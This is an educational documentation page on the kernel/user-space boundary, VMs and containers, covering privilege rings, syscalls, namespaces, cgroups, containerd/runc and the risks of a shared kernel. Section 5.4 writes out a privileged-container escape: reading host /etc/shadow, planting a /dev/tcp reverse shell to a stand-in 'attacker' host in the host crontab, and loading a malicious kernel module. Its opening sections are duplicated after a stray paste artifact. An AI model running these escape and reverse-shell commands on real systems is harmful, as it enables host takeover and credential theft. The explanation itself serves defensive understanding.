Kernel Space and User Space in Virtualization and Containers¶

Audience: Developers with basic Linux knowledge who want to understand how process isolation really works — from CPU privilege rings down to what happens when a containerized process makes a system call.

Modern operating systems split memory and execution into two distinct domains: kernel space and user space. This boundary is one of the most fundamental concepts in systems programming, and understanding it is essential for reasoning about how virtual machines, containers, and tools like Docker or containerd actually provide (or fail to provide) isolation. This page walks from first principles — CPU rings, context switches, system calls — through to the concrete security implications of sharing a kernel across dozens of containers.

1. Definitions¶

Kernel Space¶

Kernel space is the region of virtual memory reserved for the operating system kernel and its extensions (drivers, kernel modules). Code running here executes at the highest privilege level and has unrestricted access to:

All physical and virtual memory
All CPU instructions, including privileged ones (lgdt, in/out, wrmsr, etc.)
All hardware devices
Every process's address space

The kernel itself — the scheduler, memory manager, VFS layer, network stack, device drivers — all live here.

User Space¶

User space is everything else: applications, daemons, libraries, language runtimes. User-space processes run in an isolated virtual address space and cannot directly access hardware or kernel memory. Any operation that requires elevated privilege — opening a file, allocating memory, sending a packet — must be requested from the kernel via a system call.

Why the Separation Exists¶

The separation is a deliberate security and stability boundary:

Concern	Without separation	With separation
Stability	A buggy app could corrupt kernel memory	A crashing process is killed; kernel is unaffected
Security	Any process could read any other process's memory	Processes are isolated in separate virtual address spaces
Integrity	Malicious code could overwrite interrupt handlers	Kernel code is protected from unprivileged writes

The boundary is enforced by hardware — not just by software convention.

2. How It Works in a Traditional OS¶

CPU Privilege Rings¶

x86/x64 CPUs implement four privilege rings (Ring 0–3), though mainstream operating systems use only two:

┌─────────────────────────────────────────┐
│             Ring 0 (Kernel)             │  ← Full hardware access
│  ┌───────────────────────────────────┐  │
│  │          Ring 3 (User)            │  │  ← Restricted, isolated
│  │   Applications & Libraries        │  │
│  └───────────────────────────────────┘  │
└─────────────────────────────────────────┘

Ring 0 — the kernel runs here. Can execute any instruction.
Ring 3 — user processes run here. Attempting a privileged instruction causes a CPU exception (General Protection Fault), which the kernel handles — usually by killing the offending process.

Rings 1 and 2 were intended for device drivers but are unused on Linux and Windows; drivers run in Ring 0.

System Calls¶

A system call (syscall) is the controlled gateway from user space into kernel space. The kernel exposes a stable ABI of ~300–400 syscalls on Linux (read, write, open, fork, mmap, socket, etc.).

The flow for a simple read() call:

User Process (Ring 3)
       │
       │  1. Calls read(fd, buf, n) in libc
       │
       │  2. libc sets up registers:
       │     rax = syscall number (0 = sys_read)
       │     rdi = fd, rsi = buf ptr, rdx = n
       │
       │  3. Executes `syscall` instruction
       ▼
  ────────────── privilege boundary ──────────────
       │
       │  4. CPU switches to Ring 0, saves user state
       │
       │  5. Kernel's syscall handler dispatches to sys_read()
       │
       │  6. Kernel copies data from file into buf
       │
       │  7. Returns to user space (Ring 3), restores state
       ▼
User Process resumes with return value in rax

This transition — saving registers, switching privilege levels, executing kernel code, and returning — is a context switch between privilege domains. It costs on the order of hundreds of nanoseconds on modern hardware.

The Virtual Address Space¶

Each user-space process has its own virtual address space (typically 128 TiB on x86-64 Linux). The upper portion is mapped to kernel memory (but not accessible from Ring 3). This means the kernel is always "present" at known virtual addresses, but the hardware enforces that Ring 3 code cannot read or write to it.

Virtual Address Space of a single process:
┌──────────────────────────────┐  0xFFFF_FFFF_FFFF_FFFF
│         Kernel Space         │  ← mapped but not accessible
│   (same physical pages for   │    from user space (Ring 3)
│    all processes)            │
├──────────────────────────────┤  0xFFFF_8000_0000_0000 (on x86-64)
│                              │
│         User Space           │  ← fully accessible from Ring 3
│   Stack | Heap | .text | ... │
│                              │
└──────────────────────────────┘  0x0000_0000_0000_0000

3. Virtualization: VMs vs Containers¶

The kernel/user-space model becomes much more interesting in virtualized environments because there are now multiple operating systems involved, each with their own kernel and user space.

Virtual Machines (Full Virtualization)¶

A hypervisor (KVM, VMware ESXi, Hyper-V) sits between the hardware and one or more guest OSes. Each VM runs a complete OS with its own kernel.

┌─────────────────────────────────────────────────────────┐
│                     Host OS / Hypervisor                │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │         VM 1             │ │         VM 2             ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  Guest User Space  │  │ │  │  Guest User Space  │  ││
│ │  │   (apps, libs)     │  │ │  │   (apps, libs)     │  ││
│ │  ├────────────────────┤  │ │  ├────────────────────┤  ││
│ │  │  Guest Kernel      │  │ │  │  Guest Kernel      │  ││
│ │  │  (isolated)        │  │ │  │  (isolated)        │  ││
│ │  └────────────────────┘  │ │  └────────────────────┘  ││
│ └──────────────────────────┘ └──────────────────────────┘│
│              ↕ Hypervisor (virtualises hardware)         │
│                     Physical Hardware                    │
└─────────────────────────────────────────────────────────┘

Key properties: - Full kernel isolation — a kernel bug in VM1 does not affect VM2. - Syscalls stay within the guest kernel — they never reach the host kernel directly. - Higher overhead — each VM boots a full OS; memory footprint is in the GB range.

Containers (OS-Level Virtualization)¶

Containers use Linux kernel features (namespaces and cgroups) to partition a single running kernel into isolated views. There is no guest kernel.

┌─────────────────────────────────────────────────────────┐
│                      Host OS                            │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │      Container A         │ │      Container B         ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  User Space        │  │ │  │  User Space        │  ││
│ │  │  (nginx, libc,     │  │ │  │  (python, libs,    │  ││
│ │  │   overlay FS)      │  │ │  │   overlay FS)      │  ││
│ │  └────────┬───────────┘  │ │  └────────┬───────────┘  ││
│ └───────────│──────────────┘ └───────────│──────────────┘│
│             └─────────────┬──────────────┘               │
│                    ┌──────▼──────┐                       │
│                    │ Host Kernel │  ← SHARED             │
│                    │  (syscalls, │                       │
│                    │  namespaces,│                       │
│                    │  cgroups)   │                       │
│                    └─────────────┘                       │
│                    Physical Hardware                     │
└─────────────────────────────────────────────────────────┘

Key properties: - Shared kernel — all containers call into the same kernel. - Lower overhead — containers start in milliseconds; overhead is in the MB range. - Weaker isolation — the shared kernel is both the isolation mechanism and the attack surface.

4. Containers Deep Dive¶

The Linux Primitives: Namespaces and cgroups¶

Containers are not a single kernel feature — they are a composition of several:

Feature	What it isolates
`pid` namespace	Process ID space — PID 1 in a container is not the host's init
`net` namespace	Network interfaces, routing tables, firewall rules
`mnt` namespace	Mount points and filesystem hierarchy
`uts` namespace	Hostname and NIS domain name
`ipc` namespace	POSIX message queues, shared memory segments
`user` namespace	UID/GID mappings (root in container ≠ root on host, optionally)
`cgroup` namespace	View of cgroup hierarchy
[200~# Kernel Space and User Space in Virtualization and Containers

Audience: Developers with basic Linux knowledge who want to understand how process isolation really works — from CPU privilege rings down to what happens when a containerized process makes a system call.

Modern operating systems split memory and execution into two distinct domains: kernel space and user space. This boundary is one of the most fundamental concepts in systems programming, and understanding it is essential for reasoning about how virtual machines, containers, and tools like Docker or containerd actually provide (or fail to provide) isolation. This page walks from first principles — CPU rings, context switches, system calls — through to the concrete security implications of sharing a kernel across dozens of containers.

Table of Contents¶

Definitions
How It Works in a Traditional OS
Virtualization: VMs vs Containers
Containers Deep Dive
Practical Examples
Comparison Table
Further Reading
Summary

1. Definitions¶

Kernel Space¶

Kernel space is the region of virtual memory reserved for the operating system kernel and its extensions (drivers, kernel modules). Code running here executes at the highest privilege level and has unrestricted access to:

All physical and virtual memory
All CPU instructions, including privileged ones (lgdt, in/out, wrmsr, etc.)
All hardware devices
Every process's address space

The kernel itself — the scheduler, memory manager, VFS layer, network stack, device drivers — all live here.

User Space¶

User space is everything else: applications, daemons, libraries, language runtimes. User-space processes run in an isolated virtual address space and cannot directly access hardware or kernel memory. Any operation that requires elevated privilege — opening a file, allocating memory, sending a packet — must be requested from the kernel via a system call.

Why the Separation Exists¶

The separation is a deliberate security and stability boundary:

Concern	Without separation	With separation
Stability	A buggy app could corrupt kernel memory	A crashing process is killed; kernel is unaffected
Security	Any process could read any other process's memory	Processes are isolated in separate virtual address spaces
Integrity	Malicious code could overwrite interrupt handlers	Kernel code is protected from unprivileged writes

The boundary is enforced by hardware — not just by software convention.

2. How It Works in a Traditional OS¶

CPU Privilege Rings¶

x86/x64 CPUs implement four privilege rings (Ring 0–3), though mainstream operating systems use only two:

┌─────────────────────────────────────────┐
│             Ring 0 (Kernel)             │  ← Full hardware access
│  ┌───────────────────────────────────┐  │
│  │          Ring 3 (User)            │  │  ← Restricted, isolated
│  │   Applications & Libraries        │  │
│  └───────────────────────────────────┘  │
└─────────────────────────────────────────┘

Ring 0 — the kernel runs here. Can execute any instruction.
Ring 3 — user processes run here. Attempting a privileged instruction causes a CPU exception (General Protection Fault), which the kernel handles — usually by killing the offending process.

Rings 1 and 2 were intended for device drivers but are unused on Linux and Windows; drivers run in Ring 0.

System Calls¶

A system call (syscall) is the controlled gateway from user space into kernel space. The kernel exposes a stable ABI of ~300–400 syscalls on Linux (read, write, open, fork, mmap, socket, etc.).

The flow for a simple read() call:

User Process (Ring 3)
       │
       │  1. Calls read(fd, buf, n) in libc
       │
       │  2. libc sets up registers:
       │     rax = syscall number (0 = sys_read)
       │     rdi = fd, rsi = buf ptr, rdx = n
       │
       │  3. Executes `syscall` instruction
       ▼
  ────────────── privilege boundary ──────────────
       │
       │  4. CPU switches to Ring 0, saves user state
       │
       │  5. Kernel's syscall handler dispatches to sys_read()
       │
       │  6. Kernel copies data from file into buf
       │
       │  7. Returns to user space (Ring 3), restores state
       ▼
User Process resumes with return value in rax

This transition — saving registers, switching privilege levels, executing kernel code, and returning — is a context switch between privilege domains. It costs on the order of hundreds of nanoseconds on modern hardware.

The Virtual Address Space¶

Each user-space process has its own virtual address space (typically 128 TiB on x86-64 Linux). The upper portion is mapped to kernel memory (but not accessible from Ring 3). This means the kernel is always "present" at known virtual addresses, but the hardware enforces that Ring 3 code cannot read or write to it.

Virtual Address Space of a single process:
┌──────────────────────────────┐  0xFFFF_FFFF_FFFF_FFFF
│         Kernel Space         │  ← mapped but not accessible
│   (same physical pages for   │    from user space (Ring 3)
│    all processes)            │
├──────────────────────────────┤  0xFFFF_8000_0000_0000 (on x86-64)
│                              │
│         User Space           │  ← fully accessible from Ring 3
│   Stack | Heap | .text | ... │
│                              │
└──────────────────────────────┘  0x0000_0000_0000_0000

3. Virtualization: VMs vs Containers¶

The kernel/user-space model becomes much more interesting in virtualized environments because there are now multiple operating systems involved, each with their own kernel and user space.

Virtual Machines (Full Virtualization)¶

A hypervisor (KVM, VMware ESXi, Hyper-V) sits between the hardware and one or more guest OSes. Each VM runs a complete OS with its own kernel.

┌─────────────────────────────────────────────────────────┐
│                     Host OS / Hypervisor                │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │         VM 1             │ │         VM 2             ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  Guest User Space  │  │ │  │  Guest User Space  │  ││
│ │  │   (apps, libs)     │  │ │  │   (apps, libs)     │  ││
│ │  ├────────────────────┤  │ │  ├────────────────────┤  ││
│ │  │  Guest Kernel      │  │ │  │  Guest Kernel      │  ││
│ │  │  (isolated)        │  │ │  │  (isolated)        │  ││
│ │  └────────────────────┘  │ │  └────────────────────┘  ││
│ └──────────────────────────┘ └──────────────────────────┘│
│              ↕ Hypervisor (virtualises hardware)         │
│                     Physical Hardware                    │
└─────────────────────────────────────────────────────────┘

Key properties: - Full kernel isolation — a kernel bug in VM1 does not affect VM2. - Syscalls stay within the guest kernel — they never reach the host kernel directly. - Higher overhead — each VM boots a full OS; memory footprint is in the GB range.

Containers (OS-Level Virtualization)¶

Containers use Linux kernel features (namespaces and cgroups) to partition a single running kernel into isolated views. There is no guest kernel.

┌─────────────────────────────────────────────────────────┐
│                      Host OS                            │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │      Container A         │ │      Container B         ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  User Space        │  │ │  │  User Space        │  ││
│ │  │  (nginx, libc,     │  │ │  │  (python, libs,    │  ││
│ │  │   overlay FS)      │  │ │  │   overlay FS)      │  ││
│ │  └────────┬───────────┘  │ │  └────────┬───────────┘  ││
│ └───────────│──────────────┘ └───────────│──────────────┘│
│             └─────────────┬──────────────┘               │
│                    ┌──────▼──────┐                       │
│                    │ Host Kernel │  ← SHARED             │
│                    │  (syscalls, │                       │
│                    │  namespaces,│                       │
│                    │  cgroups)   │                       │
│                    └─────────────┘                       │
│                    Physical Hardware                     │
└─────────────────────────────────────────────────────────┘

Key properties: - Shared kernel — all containers call into the same kernel. - Lower overhead — containers start in milliseconds; overhead is in the MB range. - Weaker isolation — the shared kernel is both the isolation mechanism and the attack surface.

4. Containers Deep Dive¶

The Linux Primitives: Namespaces and cgroups¶

Containers are not a single kernel feature — they are a composition of several:

Feature	What it isolates
`pid` namespace	Process ID space — PID 1 in a container is not the host's init
`net` namespace	Network interfaces, routing tables, firewall rules
`mnt` namespace	Mount points and filesystem hierarchy
`uts` namespace	Hostname and NIS domain name
`ipc` namespace	POSIX message queues, shared memory segments
`user` namespace	UID/GID mappings (root in container ≠ root on host, optionally)
`cgroup` namespace	View of cgroup hierarchy
cgroups v2	Resource limits: CPU, memory, I/O, PIDs

These namespaces give each container a virtualised view of the system, but all system calls still reach the same host kernel.

What Runs in User Space Per Container¶

Each container has its own isolated user space containing:

Root filesystem — typically an OCI image layer stack (e.g., alpine:3.19 + your app layer), mounted via overlayfs. This provides a private /bin, /lib, /etc, etc.
Processes — each container has its own PID namespace; the first process is PID 1 inside the container.
Libraries — libc, language runtimes, and dependencies come from the container image, not the host.
Environment — its own hostname, network interfaces, and mount tree.

Container A's user space:
/
├── bin/         ← from Alpine base image layer
├── lib/         ← libc from Alpine, NOT the host's libc
├── usr/
│   └── local/
│       └── bin/nginx   ← application layer
├── etc/
│   └── nginx/nginx.conf
├── proc/        ← virtualised via pid + mount namespace
└── sys/         ← virtualised

The kernel itself — at /proc/version, in kernel memory, in system call tables — is the host kernel and is identical for all containers.

How containerd Manages This¶

containerd is the industry-standard container runtime (used by Docker, Kubernetes, and others). Its role in the stack:

┌──────────────────────────────────┐
│  User (CLI / Kubernetes)         │
├──────────────────────────────────┤
│  containerd (container lifecycle │
│  management — image pull,        │
│  snapshot management, task API)  │
├──────────────────────────────────┤
│  runc (OCI runtime)              │
│  → calls clone(2) with CLONE_NEW*│
│    flags to create namespaces    │
│  → sets up cgroups, pivot_root   │
│  → execs container entrypoint    │
├──────────────────────────────────┤
│  Linux Kernel                    │
│  (namespaces, cgroups, overlayfs)│
└──────────────────────────────────┘

runc — the low-level OCI runtime — directly invokes syscalls like clone(2), unshare(2), pivot_root(2), and mount(2) to set up the container environment. It does not involve any virtual machine or hypervisor.

Isolation and Security Implications¶

Because every container shares the host kernel:

There is no kernel isolation. A vulnerability in the kernel is exploitable by any container.
Namespace escapes are possible. Misconfigured namespaces (e.g., a container with access to the host's pid namespace) break isolation entirely.
Privileged containers are dangerous. Running a container with --privileged or excessive capabilities grants near-root access to the host.
The syscall surface is the attack surface. Every syscall reachable from a container is a potential exploit path into the shared kernel.

Mitigation tools (seccomp, AppArmor/SELinux, user namespaces) reduce this surface but do not eliminate it.

5. Practical Examples¶

5.1 Architecture Diagram (Mermaid)¶

graph TD
    subgraph Host["Host Machine"]
        subgraph ContainerA["Container A (nginx)"]
            A_proc["PID 1: nginx\n(user space)"]
            A_fs["overlayfs root\n/bin, /lib, /etc/nginx"]
            A_net["veth0\n172.17.0.2/16"]
        end

        subgraph ContainerB["Container B (python app)"]
            B_proc["PID 1: python\n(user space)"]
            B_fs["overlayfs root\n/bin, /lib, /app"]
            B_net["veth1\n172.17.0.3/16"]
        end

        subgraph Kernel["Host Kernel (shared)"]
            NS["Namespaces\n(pid, net, mnt, uts, ipc)"]
            CG["cgroups v2\n(CPU, memory limits)"]
            SC["Syscall Table\nsys_read, sys_write, sys_socket…"]
            NET["Network Stack\niptables / nftables"]
            FS["VFS / overlayfs"]
        end

        A_proc -->|"syscall (e.g. read, write, socket)"| SC
        B_proc -->|"syscall (e.g. read, write, socket)"| SC
        SC --> NS
        SC --> CG
        SC --> NET
        SC --> FS
    end

5.2 A System Call from Inside a Container¶

Consider a Python process inside Container B calling socket.connect(). Here is the full path from container user space to the shared kernel:

Python (user space, inside container):

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("93.184.216.34", 80))  # example.com

What happens at the kernel boundary:

// libc translates socket() to the connect(2) syscall:
// rax = 42  (SYS_connect on x86-64)
// rdi = sockfd
// rsi = &sockaddr  { AF_INET, port=80, ip=93.184.216.34 }
// rdx = sizeof(sockaddr_in)
// → syscall instruction

// Inside the HOST kernel (sys_connect):
long sys_connect(int fd, struct sockaddr __user *uservaddr, int addrlen) {
    struct socket *sock = sockfd_lookup_light(fd, ...);
    // sock->ops->connect() calls the TCP/IP stack
    // Uses the HOST kernel's network namespace for Container B
    // Routes through the host's veth pair and docker0 bridge
}

Key observation: the connect(2) syscall executes in the host kernel's network stack. The container's net namespace gives it an isolated view (its own routing table, its own eth0), but the code executing is the host kernel's TCP implementation — the same code serving Container A and the host itself.

5.3 Security Implication: Kernel Exploit Affects All Containers¶

Scenario: Dirty Pipe (CVE-2022-0847)

In February 2022, a vulnerability was disclosed in the Linux kernel's pipe subsystem (affects kernels 5.8–5.16.10). It allowed an unprivileged local user to overwrite arbitrary read-only files, including SUID binaries.

# Inside Container A (running as non-root UID 1000)
# The attacker has no special privileges inside the container.

# 1. Exploit overwrites /usr/bin/su inside the container's overlayfs —
#    but the kernel bug allows writing through to the underlying page cache.

# 2. Because the PAGE CACHE IS SHARED across all containers and the host,
#    the attacker can overwrite host files that happen to be mmap'd
#    or read by the kernel.

# 3. Result: privilege escalation to root ON THE HOST,
#    breaking out of Container A entirely.

Why this is different from a VM scenario:

In a VM, the guest kernel's pipe subsystem is isolated. CVE-2022-0847 in the guest kernel would give root inside the VM, but the hypervisor boundary would stop the exploit from reaching the host or other VMs. In a container environment, there is no such boundary — every container on the host was vulnerable until the host kernel was patched.

Mitigation layers (none are complete substitutes for patching):

# Example: seccomp profile blocking dangerous syscalls
# (Docker default profile, excerpt)
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    {
      "names": ["read", "write", "open", "close", "mmap", ...],
      "action": "SCMP_ACT_ALLOW"
    }
    # splice(2), the syscall central to Dirty Pipe, is allowed
    # by Docker's default profile — illustrating the difficulty
    # of blocking syscalls without breaking legitimate workloads.
  ]
}

5.4 Container Escape via Privileged Mode¶

Running a container with --privileged removes nearly all namespace isolation:

# On the host, a developer runs a "debug" container carelessly:
docker run --privileged -it ubuntu bash

# Inside the container, an attacker can:

# 1. Mount the host filesystem
mkdir /host
mount /dev/sda1 /host     # /dev/sda1 is visible because --privileged
                           # grants access to ALL host devices

# 2. Read and modify host files
cat /host/etc/shadow      # host password hashes
echo "* * * * * root bash -i >& /dev/tcp/attacker/4444 0>&1" \
  >> /host/etc/crontab    # plant a reverse shell

# 3. Load a kernel module (full kernel compromise)
insmod /malicious.ko      # arbitrary kernel code execution on the HOST

This escape works because --privileged grants CAP_SYS_ADMIN and disables seccomp/AppArmor, effectively giving the container access to the host kernel's full interface.

6. Comparison Table¶

Dimension	Bare Metal	Virtual Machine	Container
Kernel	Host kernel only	Separate guest kernel per VM	Shared host kernel
Isolation level	None (single OS)	Strong (hypervisor boundary)	Moderate (namespace boundary)
Kernel sharing	N/A	No — each VM has its own	Yes — all containers on host
Attack surface	Full host	Guest kernel + hypervisor API	Host kernel syscall table
A kernel CVE affects…	The host	Only VMs running that kernel version	All containers on the host
Startup time	N/A	Seconds to minutes	Milliseconds
Memory overhead	None	~512 MB – several GB per VM	~10–50 MB per container
Filesystem isolation	None	Full (virtual disk)	overlayfs per container
Network isolation	None	Virtual NIC per VM	`net` namespace per container
Syscall path	Direct to kernel	Guest kernel → hypervisor (vmcall/vmexit)	Direct to host kernel (via namespace filter)
Root in environment = root on host?	Yes	No (root in guest ≠ host root)	Potentially yes (without user namespaces)
Use case	Max performance, single tenant	Strong multi-tenant isolation	High-density, microservices, CI
Examples	Physical server	KVM, VMware ESXi, Hyper-V	Docker, containerd/runc, LXC, Podman

7. Further Reading¶

Linux Kernel and System Calls¶

Linux Kernel Documentation: syscalls
The Linux Programming Interface — Michael Kerrisk (definitive reference)
man 2 syscall, man 2 clone, man 7 namespaces, man 7 cgroups

Containers and Runtimes¶

OCI Runtime Specification — defines what runc implements
containerd Architecture — official docs
Containers from Scratch — Liz Rice, GOTO 2018 (excellent live demo building a container with raw Go syscalls)
Linux Namespaces — LWN series by Michael Kerrisk

Security¶

CVE-2022-0847 (Dirty Pipe) analysis — original writeup by Max Kellermann
NCC Group: Understanding and Hardening Linux Containers
gVisor — Google's user-space kernel for containers (addresses the shared-kernel problem)
Kata Containers — lightweight VMs that look like containers (hardware isolation + container UX)
seccomp-bpf — syscall filtering for containers

Tools¶

strace — trace syscalls made by a process (works inside containers)
nsenter — enter the namespaces of a running container
unshare — create new namespaces from the shell
Falco — runtime security; detects anomalous syscall behaviour in containers

8. Summary¶

The kernel/user-space boundary is a hardware-enforced privilege separation that underpins all OS security and stability. System calls are the only legal crossing point, governed by CPU rings and a controlled kernel ABI.

Virtual machines extend this model by running complete guest kernels inside a hypervisor, giving each VM its own isolated kernel. This means a kernel-level exploit in one VM stays within that VM.

Containers take a fundamentally different approach: they use Linux namespaces to create isolated views of a single running kernel, and cgroups to enforce resource limits. The kernel itself is shared. This makes containers fast and lightweight, but it means:

The kernel is the trust boundary — and it is shared by every container on the host.
A kernel vulnerability is a host-wide vulnerability — not scoped to a single container.
User space is fully isolated per container (filesystem, processes, network interfaces), but kernel space is not.

For most workloads, the container isolation model is acceptable when combined with defence-in-depth (seccomp profiles, AppArmor/SELinux policies, non-root users, minimal capabilities, image provenance). For high-security multi-tenant environments, consider gVisor (user-space kernel) or Kata Containers (lightweight VMs) to recover hardware-level isolation without sacrificing the container developer experience.

Page last updated: 2025. Kernel behaviour described targets Linux 5.15+ / 6.x LTS unless otherwise noted.